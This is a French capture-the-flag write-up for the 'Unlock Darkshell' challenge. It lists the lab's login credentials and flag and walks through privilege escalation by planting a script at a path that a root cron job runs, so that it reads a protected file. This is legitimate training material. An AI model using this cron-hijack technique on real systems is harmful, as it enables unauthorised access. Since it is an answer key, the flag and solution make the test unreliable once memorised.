#Unlock Darkshell

## Consignes


Démarrer un environnement virtuel pour résoudre ce challenge : {lien vers le challenge sur portailvms}

Se connecter ensuite en ssh :

 - identifiant: joueur
 - Mot de passe : azerty

Cherchez et vous trouverez. Attention, le temps est compté ...


## Points attribués

```
40 Points
```

## Flag

```
fl@g{Unlock_40}
```

## Déroulé:


Se connecter sur le portailvms, puis connexion en SSH sur l'adresse IP indiquée par le portail. Seul le login "joueur" peut se connecter (adapter l'adresse IP) :
```bash
ssh joueur@172.102.100.xxx

```


Lire le fichier `readme.txt` :

```
01010100 01110010 01101111 01110101 01110110 01100101 01111010 00100000 01101100 01100101 00100000 01100010 01101111 01101110 00100000 01110110 01100101 01110010 01110010 01101111 01110101 00100000 01100101 01110100 00100000 01101101 01100101 01110100 01110100 01100101 01111010 00100000 01101100 01100001 00100000 01100010 01101111 01101110 01101110 01100101 00100000 01100011 01101100 11101001 
```
Le décoder, par exemple en ligne sur https://www.binaryhexconverter.com/binary-to-ascii-text-converter. Une fois décodé : `Trouvez le bon verrou et mettez la bonne clé`


On suppose que le flag est dans le fichier `galf` car nous n'avons pas le droit de le lire. On constate que la connexion "ssh" est coupée toutes les 5 minutes. On suppose la présence d'une tâche planifiée.


Il faut identifier qu'une tâche planifiée lié à l'utilisateur root existe et appelle deux scripts, `reboot` et `verrou` :

```
cat /etc/crontabs/root 
# do daily/weekly/monthly maintenance
# min	hour	day	month	weekday	command
*/5	*	*	*	*	/etc/reboot
*/1	*	*	*	*	/home/joueur/verrou
```

Il faut remarquer qu'il manque le fichier `verrou` au chemin suivant : `/home/joueur/`

Il faut créer le fichier et le rendre exécutable :

```bash
touch verrou
chmod 750 verrou
```

Dans le fichier verrou :
```
#!/bin/sh
cat /home/joueur/galf > /home/joueur/result.txt
```

Au bout de maximum une minute, le fichier est créé. On récupère le contenu et on le décode :

```
echo "ZmxAZ3tVbmxvY2tfNDB9" | base64 -d
fl@g{Unlock_40}
```



